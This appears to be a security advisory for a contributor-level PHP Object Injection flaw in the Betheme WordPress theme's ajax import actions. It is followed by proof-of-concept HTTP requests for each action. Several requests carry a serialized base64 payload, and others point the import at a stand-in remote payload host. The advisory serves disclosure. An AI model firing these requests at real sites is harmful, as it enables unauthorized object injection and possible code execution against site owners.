Betheme < 26.6 - Contributor+ PHP Object Injection

The plugin unserializes user input provided via the import, mfn-items-import-page, and mfn-items-import parameters passed through the mfn_builder_import, mfn_builder_import_page, importdata, importsinglepage, and importfromclipboard functions. This could allow users with a role as low as contributor to perform PHP Object Injection when a suitable gadget is present

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 75 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action;=mfn_builder_import&mfn-items-import;=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= To exploit the “mfn_builder_import_page” ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 123 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action;=mfn_builder_import_page&mfn-items-import-page;=https://your-remote-payload.com/ To exploit the “importdata” ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 114 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action;=importdata&import;=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30= To exploit the “importsinglepage” ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 83 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action;=importsinglepage&import;=https://your-remote-payload.com/ To exploit the “importfromclipboard” ajax action, use: POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost Content-Length: 123 Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 Cookie: [your-auth-cookies] Connection: close mfn-builder-nonce=[your-nonce]&action;=importfromclipboard&import;=Tzo4OiJzdGRDbGFzcyI6MTp7czozOiJyY2UiO3M6ODoic2VjdXJpdHkiO30=